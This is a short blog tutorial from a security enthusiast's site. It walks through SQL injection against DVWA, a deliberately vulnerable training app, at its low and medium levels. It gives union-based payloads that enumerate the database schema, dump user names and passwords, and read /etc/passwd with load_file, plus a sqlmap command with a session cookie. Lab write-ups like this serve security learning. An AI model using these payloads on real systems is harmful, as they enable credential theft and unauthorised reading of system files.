Samiux's Blog

Open Source is a great idea and it has changed the world! Open Source forever ....

While you do not know attack, how can you know about defense? (未知攻,焉知防?)

Do BAD things .... for the RIGHT reasons -- OWASP ZAP

It is easier to port a shell than a shell script. -- Larry Wall

Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris. -- Larry Wall

为天地立心，为生民立命，为往圣继绝学，为万世开太平。 -- 王炜

Friday, August 02, 2013

HOWTO : DVWA SQL Injection

Security level = low

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'

- will display the users table column list

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory

99 or 1=1 union all select null,load_file('/etc/passwd')
- will display the content of /etc/passwd

Security level = medium

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since where clause cannot be used, all column name should be listed

or

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

- where 0x7573657273 is Hex value of "users"

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory

sqlmap for Security = low

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

For Security = medium is similar.

That's all! See you!